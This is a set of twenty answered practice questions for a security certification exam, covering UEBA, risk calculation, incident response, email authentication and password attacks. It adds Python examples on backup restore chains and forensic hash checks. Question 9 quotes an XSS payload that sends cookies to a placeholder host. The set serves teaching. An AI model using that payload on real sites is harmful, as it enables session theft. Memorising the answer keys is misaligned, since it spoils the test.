7.3. Practice Questions
These questions cross domain boundaries, simulating the integrative style of the actual exam.
Question 1. A company discovers that an attacker has been in their network for three months, exfiltrating customer data through encrypted HTTPS connections to an external server. Which security capability would have been MOST effective at detecting this activity earlier?
A. Network-based IDS with signature detection
B. Web application firewall (WAF)
C. User and Entity Behavior Analytics (UEBA)
D. Network Access Control (NAC)
Answer: C. UEBA establishes baseline behavior and detects anomalies like unusual data transfer volumes, abnormal access patterns, or communication with unfamiliar external servers. The encrypted HTTPS connections would bypass signature-based IDS (A), a WAF protects web applications, not outbound connections (B), and NAC controls device admission, not ongoing behavior (D).
Question 2. An organization's risk assessment identifies a vulnerability with a CVSS score of 9.8 on an internal server that stores archived marketing materials. The same assessment finds a CVSS score of 6.5 vulnerability on the internet-facing payment processing API. Which should be remediated FIRST?
A. The CVSS 9.8 vulnerability because it has a higher severity score
B. The CVSS 6.5 vulnerability because the asset is more critical and exposed
C. Both simultaneously because all critical vulnerabilities require immediate attention
D. Neither — both should go through the standard change management process
Answer: B. Context-based prioritization considers asset criticality and exposure, not just CVSS scores. The payment API is internet-facing (higher exposure), processes financial data (higher asset criticality), and handles regulated data (PCI DSS implications). The archived marketing server, despite the higher CVSS score, has lower business impact.
Question 3. A security analyst receives an alert that an employee's account is accessing the HR database at 2:00 AM from a foreign IP address. The employee is a marketing coordinator with no legitimate need for HR data. Which THREE actions should the analyst take FIRST? (Choose 3)
A. Disable the employee's account immediately
B. Notify law enforcement
C. Verify the alert is not a false positive by checking additional data sources
D. Begin a full forensic investigation of the employee's workstation
E. Document the event and escalate to the incident response team
F. Isolate the affected systems from the network
Answer: A, C, E. The analyst should verify the alert (C — check for VPN use, scheduled tasks, or account compromise), disable the account to prevent further unauthorized access (A — containment), and document and escalate (E — proper incident response process). Law enforcement (B) comes later. Full forensics (D) requires IR team involvement. System isolation (F) may be premature before confirming the scope.
Question 4. A company wants to ensure that emails sent from their domain cannot be spoofed. They have already implemented SPF. What should they implement NEXT for the most effective email authentication?
A. S/MIME encryption for all outbound emails
B. DKIM to add digital signatures to outbound emails
C. A spam filter with machine learning capabilities
D. TLS encryption for mail server connections
Answer: B. DKIM adds cryptographic signatures to emails, proving they haven't been modified in transit. Combined with SPF (which validates the sending server), DKIM provides the foundation for DMARC enforcement. S/MIME (A) encrypts email content, which is different from preventing spoofing. Spam filtering (C) is a receiving-side control. TLS (D) encrypts transport but doesn't authenticate the sender.
Question 5. An organization calculates that a server worth $600,000 faces a threat with a 20% exposure factor occurring 0.5 times per year. Cyber insurance costs $50,000/year. What is the ALE, and is insurance cost-effective?
A. ALE = $60,000; insurance is not cost-effective
B. ALE = $120,000; insurance is cost-effective
C. ALE = $60,000; insurance is cost-effective
D. ALE = $120,000; insurance is not cost-effective
Answer: C. SLE = AV × EF = $600,000 × 0.20 = $120,000. ALE = SLE × ARO = $120,000 × 0.5 = $60,000/year. Insurance costs $50,000/year, which is less than the ALE of $60,000 — so insurance IS cost-effective. The organization saves $10,000/year in expected loss by transferring the risk. Answer A has the correct ALE but the wrong conclusion. Answer B has the wrong ALE.
Question 6. During a penetration test, the tester discovers they can escalate from a standard user account to domain administrator by exploiting a misconfigured Group Policy. This is an example of:
A. Horizontal privilege escalation
B. Vertical privilege escalation
C. Lateral movement
D. Credential stuffing
Answer: B. Vertical privilege escalation moves from a lower privilege level (standard user) to a higher one (domain administrator). Horizontal escalation (A) would be accessing another standard user's account. Lateral movement (C) is moving between systems at the same privilege level. Credential stuffing (D) uses stolen credentials from other breaches.
Question 7. A company implements WPA3-Enterprise for its wireless network. Which authentication method does this use?
A. Pre-shared key (PSK)
B. 802.1X with a RADIUS server
C. Open authentication with MAC filtering
D. Simultaneous Authentication of Equals (SAE) with a shared password
Answer: B. WPA3-Enterprise uses 802.1X authentication with a RADIUS server, providing per-user credentials and certificates. WPA3-Personal uses SAE (D), which replaces the PSK four-way handshake from WPA2. PSK (A) is WPA2-Personal. Open authentication with MAC filtering (C) provides no real security.
Question 8. An organization discovers that a former employee's VPN account is still active three months after termination. Which control failure is MOST directly responsible?
A. Lack of multifactor authentication
B. Inadequate offboarding procedures
C. Missing intrusion detection system
D. Insufficient password complexity requirements
Answer: B. The offboarding process should ensure timely and comprehensive access revocation across all systems. MFA (A) would add a layer but doesn't address the root cause — the account shouldn't exist at all. IDS (C) might detect usage but not prevent it. Password complexity (D) is unrelated to account lifecycle management.
Question 9. A security analyst sees the following in a web server log: GET /search?q=<script>document.location='http://evil.com/steal?c='+document.cookie</script>. What type of attack is this?
A. SQL injection
B. Cross-site scripting (XSS)
C. Cross-site request forgery (CSRF)
D. Server-side request forgery (SSRF)
Answer: B. The <script> tag injected into a URL parameter is a reflected XSS attack attempting to steal cookies. SQL injection (A) would inject SQL commands like ' OR 1=1. CSRF (C) tricks authenticated users into submitting unwanted requests — it doesn't inject scripts. SSRF (D) exploits server-side URL fetching.
Question 10. An organization's SIEM generates 5,000 alerts per day. The security team can investigate 50. Most alerts are false positives. What should the team do FIRST?
A. Purchase an XDR solution to replace the SIEM
B. Hire additional security analysts
C. Tune SIEM detection rules and correlation logic
D. Disable low-priority alert categories
Answer: C. Tuning reduces false positives by refining correlation rules, adjusting thresholds, and adding context (known-good baselines, asset criticality). Replacing the SIEM (A) moves the problem to a new tool. Hiring (B) is expensive and doesn't fix the root cause. Disabling categories (D) risks missing real threats. Tune first, then assess if additional resources are needed.
Question 11. Which of the following BEST describes the difference between a vulnerability scan and a penetration test?
A. Vulnerability scans are automated; penetration tests are always manual
B. Vulnerability scans identify weaknesses; penetration tests attempt to exploit them
C. Vulnerability scans test external systems; penetration tests test internal systems
D. Vulnerability scans require credentials; penetration tests do not
Answer: B. The fundamental distinction: scanning finds known vulnerabilities by checking versions and configurations against databases. Penetration testing actively attempts exploitation, chains vulnerabilities, and demonstrates actual business impact. Scans can be manual or automated (A is incorrect). Both can test internal or external (C is incorrect). Both can use credentials or not (D is incorrect).
Question 12. A user reports receiving an urgent text message claiming to be from their bank, asking them to click a link to verify a suspicious transaction. What type of attack is this?
A. Vishing
B. Phishing
C. Smishing
D. Whaling
Answer: C. Smishing is SMS-based phishing (text messages). Vishing (A) is voice/phone-based phishing. Standard phishing (B) is email-based. Whaling (D) targets senior executives specifically. The delivery channel determines the term: email = phishing, phone = vishing, text = smishing.
Question 13. An organization needs to ensure that a third-party cloud provider meets specific uptime and incident notification requirements. Which document type is MOST appropriate?
A. Non-disclosure agreement (NDA)
B. Memorandum of understanding (MOU)
C. Service level agreement (SLA)
D. Business partners agreement (BPA)
Answer: C. SLAs define measurable performance requirements with penalties for non-compliance — uptime percentages, response times, and notification timelines are all SLA elements. NDAs (A) protect confidentiality. MOUs (B) document mutual intent without strict enforcement. BPAs (D) define partner responsibilities in a business relationship.
Question 14. A company implements role-based access control. A database administrator changes departments to marketing but retains their DBA privileges. What security principle is being violated?
A. Separation of duties
B. Least privilege
C. Need to know
D. Defense in depth
Answer: B. Least privilege requires that users have only the minimum permissions needed for their current role. When the DBA moved to marketing, their DBA privileges should have been revoked through access recertification. Separation of duties (A) prevents a single person from completing a critical task alone. Need to know (C) restricts access to information required for current assignments — related but less specific. Defense in depth (D) is about layered controls.
Question 15. Which backup strategy requires the LEAST storage space but takes the LONGEST to restore?
A. Full backup
B. Incremental backup
C. Differential backup
D. Snapshot
Answer: B. Incremental backups only store changes since the last backup of any type, using the least storage. However, restoration requires the last full backup plus every incremental since — the most complex and time-consuming restore. Differential (C) stores changes since the last full backup — more storage than incremental but faster restore (only needs full + latest differential). Full (A) uses the most storage but restores fastest.
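The restore-chain reasoning in this answer, as an added example that is not part of the original question set. It assumes a constructed backup catalogue in which the same daily change sets are captured once under an incremental strategy and once under a differential strategy, so storage and sets-to-restore can be compared side by side.

```python
from datetime import date

# Constructed catalogue: (day, strategy, backup_type, size_gb). Differential
# sizes grow because each one re-captures every change since the last full.
CATALOG = [
    (date(2025, 6, 1), "incremental", "full", 500),
    (date(2025, 6, 2), "incremental", "incremental", 20),
    (date(2025, 6, 3), "incremental", "incremental", 15),
    (date(2025, 6, 4), "incremental", "incremental", 25),
    (date(2025, 6, 1), "differential", "full", 500),
    (date(2025, 6, 2), "differential", "differential", 20),
    (date(2025, 6, 3), "differential", "differential", 35),
    (date(2025, 6, 4), "differential", "differential", 60),
]
TARGET = date(2025, 6, 4)  # constructed restore point

def restore_chain(catalog, strategy, target_day):
    """Ordered list of backup sets needed to restore `target_day`.
    Incremental: last full plus EVERY incremental after it up to the target.
    Differential: last full plus only the LATEST differential up to the target."""
    sets = sorted(e for e in catalog if e[1] == strategy and e[0] <= target_day)
    # most recent full backup at or before the target day anchors the chain
    full_idx = max(i for i, e in enumerate(sets) if e[2] == "full")
    chain = [sets[full_idx]]
    later = sets[full_idx + 1:]
    if strategy == "incremental":
        chain += later
    elif later:
        chain.append(later[-1])
    return chain

def storage_gb(catalog, strategy):
    """Total storage consumed by one strategy's backup sets."""
    return sum(e[3] for e in catalog if e[1] == strategy)

def compare(catalog, target_day):
    """Sets-to-restore versus storage for both strategies at one restore point."""
    return {s: {"sets_to_restore": len(restore_chain(catalog, s, target_day)),
                "storage_gb": storage_gb(catalog, s)}
            for s in ("incremental", "differential")}
```

Run `compare(CATALOG, TARGET)` to see the trade-off the answer describes: the incremental strategy uses less storage but needs four sets to restore, the differential strategy needs only two.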
Question 16. An attacker sends thousands of login attempts using the password "Summer2025!" against every account in the organization. What type of attack is this?
A. Brute force
B. Dictionary attack
C. Password spraying
D. Credential stuffing
Answer: C. Password spraying uses a small number of common passwords against many accounts (horizontal attack). This evades account lockout policies because each account sees only one or two failed attempts. Brute force (A) tries many passwords against one account (vertical). Dictionary attacks (B) use wordlists against targeted accounts. Credential stuffing (D) uses previously breached username/password pairs.
Question 17. A company stores customer credit card numbers. To reduce PCI DSS scope, they replace stored card numbers with randomly generated tokens that have no mathematical relationship to the original numbers. What technique is this?
A. Encryption
B. Hashing
C. Data masking
D. Tokenization
Answer: D. Tokenization replaces sensitive data with non-sensitive tokens that can be mapped back to the original through a secure token vault. Because tokens have no mathematical relationship to the card numbers, systems handling tokens are outside PCI DSS scope. Encryption (A) is reversible with a key but the encrypted data is still considered cardholder data under PCI DSS. Hashing (B) is one-way and can't retrieve the original. Data masking (C) is irreversible in the masked copy.
Question 18. During incident response, the security team has confirmed a ransomware infection on 15 workstations. The malware is still spreading via an SMB vulnerability. What phase of incident response are they in, and what is the IMMEDIATE priority?
A. Detection phase — scan all systems to identify the malware variant
B. Containment phase — isolate affected systems and block SMB traffic on vulnerable segments
C. Eradication phase — remove the ransomware and patch the SMB vulnerability
D. Recovery phase — restore systems from backups
Answer: B. With confirmed infection and active spreading, the immediate priority is containment — stopping the spread. This means isolating affected workstations (network quarantine) and blocking the exploitation vector (SMB traffic rules). Detection (A) is already complete — they've confirmed the infection. Eradication (C) and recovery (D) come after containment stops the bleeding.
Question 19. An organization wants to implement Zero Trust architecture. Which component makes the final allow/deny decision for each access request?
A. Policy Engine
B. Policy Enforcement Point
C. Policy Administrator
D. Identity Provider
Answer: B. The Policy Enforcement Point (PEP) is the gatekeeper that enforces the access decision — it sits in the data plane and allows or blocks the connection. The Policy Engine (A) evaluates the request against policies and decides whether to grant access (control plane). The Policy Administrator (C) communicates the decision from the engine to the enforcement point. The Identity Provider (D) authenticates users but doesn't make access decisions.
Question 20. A forensic investigator needs to prove that digital evidence hasn't been altered since collection. Which technique provides this assurance?
A. Encryption of the evidence drive
B. Cryptographic hash of the forensic image
C. Chain of custody documentation
D. Write-blocking during acquisition
Answer: B. A cryptographic hash (for example SHA-256) of the forensic image creates a unique fingerprint. If the hash of the evidence matches the hash taken at acquisition, the evidence hasn't been altered. Encryption (A) protects confidentiality, not integrity verification. Chain of custody (C) documents who handled the evidence and when — essential for admissibility but doesn't prove integrity. Write-blocking (D) prevents alteration during acquisition but doesn't verify integrity after the fact.
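The verification step this answer describes, as an added example that is not part of the original question set: hash the image at acquisition, re-hash it later, and compare. The image content is a constructed stand-in written to a temporary file; the single-byte alteration in `demo()` is constructed to show that the comparison fails after any change.

```python
import hashlib
import os
import tempfile

def hash_file(path, algorithm="sha256", chunk_size=1024 * 1024):
    """Hash a possibly very large image in fixed-size chunks so the whole
    file never has to be held in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_image(path, acquisition_hash, algorithm="sha256"):
    """Re-hash the image and compare with the hash recorded at acquisition.
    Returns (matches, current_hash) so both values can be written into the
    chain-of-custody record alongside the result."""
    current = hash_file(path, algorithm)
    # normalise case so a hash transcribed in upper-case hex does not mis-compare
    return current == acquisition_hash.strip().lower(), current

def demo():
    """Constructed scenario: acquire, verify, alter one byte, verify again."""
    image = b"\x00" * 4096 + b"evidence" + b"\xff" * 4096  # constructed stand-in
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "disk.img")
        with open(path, "wb") as f:
            f.write(image)
        acquired = hash_file(path)            # value recorded at acquisition
        ok_before, _ = verify_image(path, acquired)
        with open(path, "r+b") as f:          # simulate a single-byte alteration
            f.seek(4096)
            f.write(b"E")
        ok_after, _ = verify_image(path, acquired)
    return ok_before, ok_after
```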
